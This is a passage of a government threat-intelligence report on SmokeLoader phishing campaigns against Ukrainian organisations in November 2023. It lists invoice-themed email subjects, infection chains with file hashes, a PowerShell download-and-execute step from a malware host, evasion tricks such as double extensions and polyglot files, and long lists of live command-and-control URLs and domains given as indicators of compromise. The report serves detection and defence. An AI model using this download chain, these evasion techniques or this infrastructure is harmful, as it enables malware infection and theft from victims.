http://restmantra.by/
http://kozachok777.ru/
http://propertyiran.ir/
http://sakentoshi.ru/
http://popuasyfromua.ru/
http://diplombar.by/
73
3-7 November 2023, "Fw invoice+act for October"
The mass distribution of the SmokeLoader via phishing emails with the subject
"Fw рахунок+акт за жовтень" (eng: "Fw invoice+act for October") was detected
by the CIROC SCPC SSSCIP between 3 to 7 November 2023. Tables 64 and 65
contain a brief overview of the applied attack vector and the sequence of the
infection chain that are relevant to this case.
Attack Vector
Infection Chain
59126c9514edae03205274dddbd30687e8287c89a6a17828de3c8ec217edc823
("Рахунок_Акт_за_жовтень_2023р.tar") ->
cc4e18d25ce53ae65c3d80fdcaa336f0439b61ed750621b4415a378a8881622e
("Рахунки.document") ->
68f5eee3b2a9ece7df774de37fe6108d6417aa4d5f1b83fee96d69e3336bdf09
("Акт_звiрки_вiд_02.11.2023_Рах_UA493077700000026002711166192.XLS.vbs" /
"Рахунок_2084121_вiд_02_11_2023р.XLS.vbs") ->
7fc53b389b0db7ea8de5293b0ab5647702ae4f53f8db62a9d4898fdfcbcfc8d8
("FiCrW.exe")
74
(hxxp://downloadrezerves[.]ru/index[.]php) resource. The response to this
request with a status code "HTTP 200 OK" is returned with the header value
"Content-Type: text/html; charset=UTF-8" that results in PowerShell commands
execution (see Figure 32), namely downloading a file from
hxxp://downloadrezerves[.]ru/download11/mstsc[.]exe, saving it under the
hidden folder AppData located in C:\Users\%USERNAME%\AppData [T1564.001]
("C:\Users\%USERNAME%\AppData\Local\Temp\FiCrW.exe" path) and its further
execution.
"FCmHAW.exe" file (file type - Win32 EXE) is the actual SmokeLoader sample, the
C2 configuration of which is represented in Table 66 [T1071.001] (totally 18
domains, 5 among which are active).
C2 Connections Configuration
http://againandagaingmorder.ru/index.php
http://colbasaibliny.ru/index.php
http://cafewithcraftbeer.ru/index.php
http://mymozhemesche.ru/index.php
http://antidomen.by/index.php
http://foodplacecafe.by/index.php
http://pozvonimnepozvoni.ru/index.php
http://ximpromooo.ru/index.php
http://narkotikizlo.ru/index.php
http://yavashakrysha.ru/index.php
http://etovamnepomozhet.ru/index.php
http://myvasocheunlyubim.ru/index.php
http://spasibozavsedruziya.ru/index.php
http://vymnenravites.by/index.php
http://propertyofiranmy.ir/index.php
http://sportlotovukraine.ru/index.php
http://vseochenxorosho.ru/index.php
http://nekuritebambuk.ru/index.php
75
9-23 November 2023, "Fw[2]: Act of reconciliation. and
invoice", "Fw: Act of reconciliation. and invoice", "Invoice",
"Fw: Invoice", "Re: Invoice", "Fw: Re: Invoice", "Fw: act of
reconciliation", "Re: Act of reconciliation", "Re: act of
reconciliation and accounts", "Accounting Invoice for
payment", "Statement and account", "Thank you the bill
attached", "Account to be paid", "act of reconciliation and
invoice", "Fwd:act of reconciliation and invoice"
The mass distribution of the SmokeLoader via phishing emails with the subjects
"Fw[2]: Акт звірки. та рахунок" (eng: "Fw[2]: Act of reconciliation. and invoice",
translation from Ukrainian), "Fw: Акт звірки. та рахунок" (eng: "Fw: Act of
reconciliation. and invoice", translation from Ukrainian), "Рахунок-фактура" (eng:
"Invoice", translation from Ukrainian), "Fw: Рахунок-фактура" (eng: "Fw: Invoice",
translation from Ukrainian), "Re: Рахунок-фактура" (eng: "Re: Invoice", translation
from Ukrainian), "Fw: Re: Рахунок-фактура" (eng: "Fw: Re: Invoice", translation
from Ukrainian), "Fw: акт звірки" (eng: "Fw: act of reconciliation", translation from
Ukrainian), "Re: Акт звірки" (eng: "Re: Act of reconciliation", translation from
Ukrainian), "Re: акт звірки та рахунки" (eng: "Re: act of reconciliation and
accounts", translation from Ukrainian), "Бух. учет. Рах. до оплаты" (eng:
"Accounting Invoice for payment", translation from mixed Ukrainian and Russian),
"Выписка та рахунок" (eng: "Statement and account", translation from mixed
Ukrainian and Russian), "Дякую рах. додаю" (eng: "Thank you the bill attached",
translation from Ukrainian), "Рах. до оплати" (eng: "Account to be paid",
translation from Ukrainian), "Рах. к оплате" (eng: "Account to be paid", translation
from mixed Ukrainian and Russian), "Рахунок до оплати" (eng:"Account to be
paid", translation from Ukrainian), "акт звірки та рахунки" (eng: "act of
reconciliation and invoice", translation from Ukrainian), "Fwd: акт звірки та
рахунки" (eng:"Fwd:act of reconciliation and invoice", translation from Ukrainian)
were detected by the CIROC SCPC SSSCIP between 9 to 23 November 2023. Table
67 contains a brief overview of the applied attack vector that is relevant to the
cases described below.
Attack Vector
76
Table 68. Applied Infection Chain(1) Overview
Infection Chain
4606430cab74535328d1378cc2a8f82531290dc70dd08b49f08fc50cbe115a7e
("акт_списання_Б-00003564_вiд_08.11.23.zip") ->
6175d5231849905e3f35015bc80fe72901018be6d16ca516c5de0477ad6ed7e2
("акт списания та .рахунок") ->
6fe8c9bfed9abde0c5ccf98f9307da5e24eb9601788274593b3e30b1fbe7f53a
("акт_списання_Б-00003564_вiд_07.11.23.XLS.exe" / "Рахунок_Б-00003564_вiд_07.11.23.XLS.exe")
"акт_списання_Б-00003564_вiд_07.11.23.XLS.exe" /
"Рахунок_Б-00003564_вiд_07.11.23.XLS.exe" file (file type - Win32 EXE) is the
actual SmokeLoader sample, the C2 configuration of which is represented in
Table 69 [T1071.001] (totally 18 domains, 5 among which are active).
Summarising the above, the initial email attachment can be opened in two ways.
C2 Connections Configuration
http://againandagaingmorder.ru/index.php
http://colbasaibliny.ru/index.php
http://cafewithcraftbeer.ru/index.php
http://mymozhemesche.ru/index.php
http://antidomen.by/index.php
http://foodplacecafe.by/index.php
77
http://pozvonimnepozvoni.ru/index.php
http://ximpromooo.ru/index.php
http://narkotikizlo.ru/index.php
http://yavashakrysha.ru/index.php
http://etovamnepomozhet.ru/index.php
http://myvasocheunlyubim.ru/index.php
http://spasibozavsedruziya.ru/index.php
http://vymnenravites.by/index.php
http://propertyofiranmy.ir/index.php
http://sportlotovukraine.ru/index.php
http://vseochenxorosho.ru/index.php
http://nekuritebambuk.ru/index.php
Infection Chain
b2e0831a199021924aec19e14716c79c6dcee675b56abf34c0062978297b90d1
("Акт_звiрки_та_рахунок_до_оплати_вiд_17_11_2023р.zip") ->
b2a67af94be79b3a27358289c53ed4a863f2514f4866176796b186599842c17c
("Акт списания та рахунок .фактрура") ->
0ab5b7bd2a995ee4a53038980dbd3d58c57086796225bd6657b616dd09cceebb
("акт_звiрки_по_рахунку_ UA653077700000026009211169274_вiд_17_11_2023р.XLS.exe" /
"Рахунок_до_оплати_АГ_1000092023_вiд_17_11_2023р.XLS.exe")
"акт_звiрки_по_рахунку_
UA653077700000026009211169274_вiд_17_11_2023р.XLS.exe" /
"Рахунок_до_оплати_АГ_1000092023_вiд_17_11_2023р.XLS.exe" file (file type -
Win32 EXE) is the actual SmokeLoader sample, the C2 configuration of which is
represented in Table 71 [T1071.001] (totally 15 domains, 4 among which are active).
Summarising the above, the initial email attachment can be opened in two ways.
78
b2a67af94be79b3a27358289c53ed4a863f2514f4866176796b186599842c17c
("Акт списания та рахунок .фактрура") ->
0ab5b7bd2a995ee4a53038980dbd3d58c57086796225bd6657b616dd09cceebb
("акт_звiрки_по_рахунку_ UA653077700000026009211169274_вiд_17_11_2023р.XLS.exe" /
"Рахунок_до_оплати_АГ_1000092023_вiд_17_11_2023р.XLS.exe")
C2 Connections Configuration
http://monopoliafromyou.ru/index.php
http://superdadymster.ru/index.php
http://hipermomentum7.ru/index.php
http://istericaoperamus.ru/index.php
http://cafesupergeroy13.ru/index.php
http://restoranguliuyuli.ru/index.php
http://popuasyvsegda.ru/index.php
http://limpopo365year.ru/index.php
http://specagendcafemsk.ru/index.php
http://druigvsegdaryadom.ir/index.php
http://zaletelicaferestoran.ru/index.php
http://spasibosaunaibanya.by/index.php
http://yalublyukartoshku.by/index.php
http://kartoshenkocaferest.ru/index.php
http://vilimonstertut.ru/index.php
Infection Chain
41682deb112f3569af4d645e600726b0cadea95b074908b93497c2733337313a
("Рахунок_до_оплати_MB_230092023_вiд_20_11_2023р_Акт_звiрки.zip") ->
930e101aea5b67868b28d20412ec1fee81f81d733059d4a1a895cc18a546341f
("Рахунок фактура та Акт .звiрки") ->
e605801bc7c2082ec270d22e7e99359678e4ef8f04c4ff64f7a628bff324620b
("акт_звiрки_по_рахунку_ UA653077200000026009211169152_вiд_20_11_2023р.XLS.exe" /
"Рахунок_до_оплати_MB_230092023_вiд_20_11_2023р.XLS.exe")
79
2) extracting "Рахунок фактура та Акт .звiрки" file (7-ZIP archive) that
contains 2 .xls.exe files [T1036.007] (which represent the identical sample of
the .xls.exe file, but with two different names).
"акт_звiрки_по_рахунку_
UA653077200000026009211169152_вiд_20_11_2023р.XLS.exe" /
"Рахунок_до_оплати_MB_230092023_вiд_20_11_2023р.XLS.exe" file (file type -
Win32 EXE) is the actual SmokeLoader sample, the C2 configuration of which is
represented in Table 73 [T1071.001] (totally 15 domains, 4 among which are active).
Summarising the above, the initial email attachment can be opened in two ways.
C2 Connections Configuration
http://monopoliafromyou.ru/index.php
http://superdadymster.ru/index.php
http://hipermomentum7.ru/index.php
http://istericaoperamus.ru/index.php
http://cafesupergeroy13.ru/index.php
http://restoranguliuyuli.ru/index.php
http://popuasyvsegda.ru/index.php
http://limpopo365year.ru/index.php
http://specagendcafemsk.ru/index.php
http://druigvsegdaryadom.ir/index.php
http://zaletelicaferestoran.ru/index.php
http://spasibosaunaibanya.by/index.php
http://yalublyukartoshku.by/index.php
http://kartoshenkocaferest.ru/index.php
http://vilimonstertut.ru/index.php
80
Attack Landscape and Infrastructure Analysis
Figure 33 displays the timechart of the UAC-0006 activity cluster (by the
quantitative indicator of the registered phishing incidents), targeting Ukraine
from May till December, 2023.
Figure 34. The proportionality of the distributed emails across targeted entities
(both Government and Commercial Facilities) by sectors to which they belong
Even while the UAC-0006 group ranks first in the category of financial crimes,
cybercriminals are not limiting themselves to the financial sector, reflecting a
strategy of exploiting multiple avenues for profit. The group exploits a wider range
of opportunities as they arise in different sectors, diversifying their targets to
maximise profit potential. In any way, information theft, ransomware and service
disruption attacks can all be monetised, demonstrating the flexibility and
opportunistic nature of cybercriminal operations.
81
Table 74 provides information about all the discovered active domains identified
during the analysis of C2 Configurations of the SmokeLoader samples that were
distributed in the obfuscated form via email attachments to the corporate email
addresses, the domains of which represent Ukrainian organisations.
82
privathostel.ru - RU-CENTER-RU 2023-08-15
83
Table 75 provides information about the IP addresses of the domains from Table
74.
Table 75. IP addresses of the domains from C2 Configurations of the SmokeLoader samples
IP Country AS AS name
188.114.96.0 US AS13335 Cloudflare, Inc.
84
Outlook
Potential future trends related to the rapidly-changing cyber threat landscape are
notoriously hard to forecast, but the analysis of historical cyberattacks is the key
aspect that provides a better understanding of the up-to-date cybersecurity
threats and helps to predict such trends, enabling organisations to responsibly
prepare for new challenges and implement appropriate security measures.
Taking into account the periodicity of the analysed attacks with the usage of
SmokeLoader over the past 7 months, it can be concluded that at this point it is
unlikely that similar phishing campaigns will be organised with a frequency
less than at least twice a month (based on the value of the calculated average
number (median) of organised campaigns per month, see Figure 37). Considering
this is important for taking precautionary measures not only to better detect and
block SmokeLoader attack attempts, but also to ensure that the IT infrastructure
will stay resilient against similar threats in the future.
Figure 37. Number of UAC-0006 campaigns per month with a highlighted trend line
The activity highlighted in this report once again emphasises that Smokeloader
infection is an entry point for a variety of cyberattacks because of its ability to
download and execute additional malicious code, which makes it a high-risk
cyberthreat with critical infection consequences.
85
● Previously compromised email addresses are used for organising
phishing campaigns. In such a way the adversaries take advantage of
trusted corporate email accounts to increase the likelihood of tricking the
target into falling for the phishing attempts.
● All email subjects are related to payment and billing. Attackers spend
time making the emails seem legitimate and relevant that increases the
likelihood of the recipient trusting and acting on the email.
● Spelling mistakes are encountered while formulating email subjects
and email body texts. Not professional translation to Ukrainian language
(including the fact that sometimes subjects and file names are composed
from a mix of Ukrainian and Russian words) once again signifies Russian
roots.
● Misleading double file extensions are often used. The primary threat of
double file extensions comes from their ability to deceive users into
thinking they are opening a harmless document. Also by default, Windows
operating systems, that are SmokeLoader infection targets, may hide
known extensions, obscuring the true nature of the file.
● Active usage of polyglot files. Polyglot files pose a serious cyber threat
because these files have multiple different file types and function
differently based on the application that will execute them, creating
prerequisites for successful bypassing the traditional antivirus/antimalware
solutions. Traditional automated security tools might not be able to fully
interpret such files, missing the malicious content hidden within. Content
filters that screen for malicious files on networks or email management
systems can be also bypassed using polyglots.
● Exploiting default Windows legitimate utilities. Users are less likely to
question the activities of trusted components of the Windows operating
system. A wide range of capabilities of such legitimate tools (among others,
the ability to maintain persistence in a system, gather information, or move
laterally across a network) as wscript.exe, powershell.exe and cmd.exe
makes them powerful and being able to cause significant damage to the
victim system when misused.
● Old SmokeLoader versions (based on C2 Configuration) are used (most of
them are dated 2022).
● Unencrypted connections to C2 servers. All the extracted C2
configurations of SmokeLoader samples contained only HTTP URIs. At the
same time, according to Figure 38 (that represents the comparison
between the total number of domains from the extracted SmokeLoader
Samples’ C2 Configurations and the number of active domains among
them) most domains from these configurations remain inactive, acting as
decoys for camouflaging C2 communication and complicating efforts for
effective detecting and tracking the malicious activity.
86
Figure 38. Comparing the total number of domains from the extracted SmokeLoader Samples’ C2
Configurations to the number of active domains among them
The section "MITRE ATT&CK & NIST 800-53 Context" of this report is dedicated to
bridging the gap in understanding the relationship between the UAC-0006 threat
and established security controls, providing clarity and direction in a field often
mired in complexity and ambiguity.
The MITRE ATT&CK framework, a living knowledge base of adversary tactics and
techniques, is instrumental in identifying and categorising the myriad ways cyber
threats manifest in the digital world. On the other side of the spectrum, NIST
800-53, a comprehensive set of security and privacy controls, provides a robust
framework for managing risks. The intersection of these two fundamental
resources offers a powerful lens through which we can analyse and fortify the
cybersecurity posture.
87
Indicators of Compromise
88
cc4e18d25ce53ae65c3d80fdcaa336f0439b61ed750621b4415a378a8881622e
68f5eee3b2a9ece7df774de37fe6108d6417aa4d5f1b83fee96d69e3336bdf09
4606430cab74535328d1378cc2a8f82531290dc70dd08b49f08fc50cbe115a7e
6175d5231849905e3f35015bc80fe72901018be6d16ca516c5de0477ad6ed7e2
b2e0831a199021924aec19e14716c79c6dcee675b56abf34c0062978297b90d1
b2a67af94be79b3a27358289c53ed4a863f2514f4866176796b186599842c17c
41682deb112f3569af4d645e600726b0cadea95b074908b93497c2733337313a
930e101aea5b67868b28d20412ec1fee81f81d733059d4a1a895cc18a546341f
7ef6ff14d157a5e8e137a4a2e489c0fded5ea116f201f1d69508ad1c37956c74
6a89bcfa9e6e5f8ab93be9031720f281b5e8923092622163a9d7b7192ad9c5d4
3500b51d167eed2a7b2703af97a8e588d676b10c557e1f16ab26de80f2b8fb86
0d910dac90a30dec52c6484bd7087f4a1d55d827a093a2f43c9dfe59a082aab9
3ac06154dea00c6f17fba1c52956affdda59eba036b3d5d077c37c93fe277a26
7781122a4a2aea14f0d7cab9d9a1a9cf0e4e9ef5f31639449f56a0b1ecebb2d9
0f93344347469ebef7b0d6768f6f50928b8e6df7bc84a4293b7c4a7bb5b98072
de995c3d45d44d3d8ad8e701d6bf1ac2433f18afc53649a9fde3e999458f44c5
888137d7b17834fbd10ad3ee72a1bfba40d8e9cc02c2cd2585e9720750dca8b8
9f1dcbc35c350d6027f98be0f5c8b43b42ca52b7604459c0c42be3aa88913d47
9d2faf3670a00160c4928e0ffc90822d9977b1a7c4caf502ee614e67860458bb
e10ffedb2a7ffd597675e0ab49a4e63b7539ee0886eaa6de14168b95978aac14
89
http://maxteroper.ru/
http://kilomunara.com/
http://napropertyhub.eu/
http://nafillimonilini.net/
http://goodlenuxilam.site/
http://jimloamfilling.online/
http://vertusupportjk.org/
http://liverpulapp.ru/
http://zarabovannyok.eu/
http://cityofuganda.ug/
http://hillespostelnm.eu/
http://jslopasitmon.com/
http://zaikadoctor.ru/
http://sismasterhome.ru/
http://supermarioprohozhdenie.ru/
http://krasavchikoleg.net/
http://samoramertut.ru/
http://metallergroup.ru/
http://infomailforyoumak.ru/
http://coinmakopenarea.su/
http://humanitarydp.ru/
http://zaikaopentra.com.ru/
http://zaikaopentra-com-ug.su/
http://kismamabeforyougo.ru/
http://kissmafiabeforyoudied.ru/
http://gondurasonline.ru/
http://privathostel.ru/
http://dublebomber.ru/
http://yavasponimayu.ru/
http://nomnetozhedenyuzhkanuzhna.ru/
http://prostosmeritesya.ru/
http://ipoluchayteudovolstvie.ru/
http://super777bomba.ru/
http://specnaznachenie.ru/
http://zakrylki809.ru/
http://propertyminsk.by/
http://iloveua.ir/
http://moyabelorussiya.by/
http://tvoyaradostetoya.ru/
http://zasadacafe.by/
http://restmantra.by/
http://kozachok777.ru/
http://propertyiran.ir/
http://sakentoshi.ru/
http://popuasyfromua.ru/
http://diplombar.by/
http://againandagaingmorder.ru/index.php
http://colbasaibliny.ru/index.php
http://cafewithcraftbeer.ru/index.php
http://mymozhemesche.ru/index.php
http://antidomen.by/index.php
http://foodplacecafe.by/index.php
http://pozvonimnepozvoni.ru/index.php
http://ximpromooo.ru/index.php
http://narkotikizlo.ru/index.php
http://yavashakrysha.ru/index.php
http://etovamnepomozhet.ru/index.php
http://myvasocheunlyubim.ru/index.php
http://spasibozavsedruziya.ru/index.php
http://vymnenravites.by/index.php
http://propertyofiranmy.ir/index.php
http://sportlotovukraine.ru/index.php
http://vseochenxorosho.ru/index.php
http://nekuritebambuk.ru/index.php
http://monopoliafromyou.ru/index.php
http://superdadymster.ru/index.php
http://hipermomentum7.ru/index.php
http://istericaoperamus.ru/index.php
http://cafesupergeroy13.ru/index.php
http://restoranguliuyuli.ru/index.php
http://popuasyvsegda.ru/index.php
http://limpopo365year.ru/index.php
http://specagendcafemsk.ru/index.php
http://druigvsegdaryadom.ir/index.php
http://zaletelicaferestoran.ru/index.php
http://spasibosaunaibanya.by/index.php
http://yalublyukartoshku.by/index.php
http://kartoshenkocaferest.ru/index.php
http://vilimonstertut.ru/index.php
90
ligaspace.ru
ipodromlan.ru
redport80.ru
superboler.com
lamazone.site
criticalosl.tech
3dstore.pro
humanitarydp.ug
shopersport.ru
sindoproperty.org
maximprofile.net
zaliphone.com
polinamailserverip.ru
zaikaopentra.com.ug
zaikaopentra-com-ug.online
infomalilopera.ru
jskgdhjkdfhjdkjhd844.ru
jkghdj2993jdjjdjd.ru
kjhgdj99fuller.ru
azartnyjboy.com
zalamafiapopcultur.eu
hopentools.site
kismamabeforyougo.com
kissmafiabeforyoudied.eu
gondurasonline.ug
nabufixservice.name
filterfullproperty.ru
alegoomaster.com
freesitucionap.com
droopily.eu
prostotaknet.net
zakolibal.online
verycheap.store
internetcygane.ru
zallesman.ru
maxteroper.ru
kilomunara.com
napropertyhub.eu
nafillimonilini.net
goodlenuxilam.site
jimloamfilling.online
vertusupportjk.org
liverpulapp.ru
zarabovannyok.eu
cityofuganda.ug
hillespostelnm.eu
jslopasitmon.com
zaikadoctor.ru
sismasterhome.ru
supermarioprohozhdenie.ru
krasavchikoleg.net
samoramertut.ru
metallergroup.ru
infomailforyoumak.ru
coinmakopenarea.su
humanitarydp.ru
zaikaopentra.com.ru
zaikaopentra-com-ug.su
kismamabeforyougo.ru
kissmafiabeforyoudied.ru
gondurasonline.ru
privathostel.ru
dublebomber.ru
yavasponimayu.ru
nomnetozhedenyuzhkanuzhna.ru
prostosmeritesya.ru
ipoluchayteudovolstvie.ru
super777bomba.ru
specnaznachenie.ru
zakrylki809.ru
propertyminsk.by
iloveua.ir
moyabelorussiya.by
tvoyaradostetoya.ru
zasadacafe.by
restmantra.by
kozachok777.ru
propertyiran.ir
sakentoshi.ru
popuasyfromua.ru
diplombar.by
againandagaingmorder.ru
91
colbasaibliny.ru
cafewithcraftbeer.ru
mymozhemesche.ru
antidomen.by
foodplacecafe.by
pozvonimnepozvoni.ru
ximpromooo.ru
narkotikizlo.ru
yavashakrysha.ru
etovamnepomozhet.ru
myvasocheunlyubim.ru
spasibozavsedruziya.ru
vymnenravites.by
propertyofiranmy.ir
sportlotovukraine.ru
vseochenxorosho.ru
nekuritebambuk.ru
monopoliafromyou.ru
superdadymster.ru
hipermomentum7.ru
istericaoperamus.ru
cafesupergeroy13.ru
restoranguliuyuli.ru
popuasyvsegda.ru
limpopo365year.ru
specagendcafemsk.ru
druigvsegdaryadom.ir
zaletelicaferestoran.ru
spasibosaunaibanya.by
yalublyukartoshku.by
kartoshenkocaferest.ru
vilimonstertut.ru
92
MITRE ATT&CK & NIST 800-53 Context
MITRE ATT&CK Tactic MITRE ATT&CK Technique MITRE ATT&CK Sub-Technique NIST 800-53 Mitigation
Defense Evasion Hide Artifacts Hidden Files and Directories Tactic is mitigated by:
TA0005 T1564 T1564.001 CM-2, CM-6, SI-2, SI-3, SI-4, SI-7
Command and Control Application Layer Protocol Web Protocols Sub-Technique is mitigated by:
TA0011 T1071 T1071.001 AC-4, CA-7, CM-2, CM-6, CM-7,
SC-10, SC-20, SC-21, SC-22, SC-23,
SC-31, SC-37, SC-7, SI-3, SI-4
93
Contact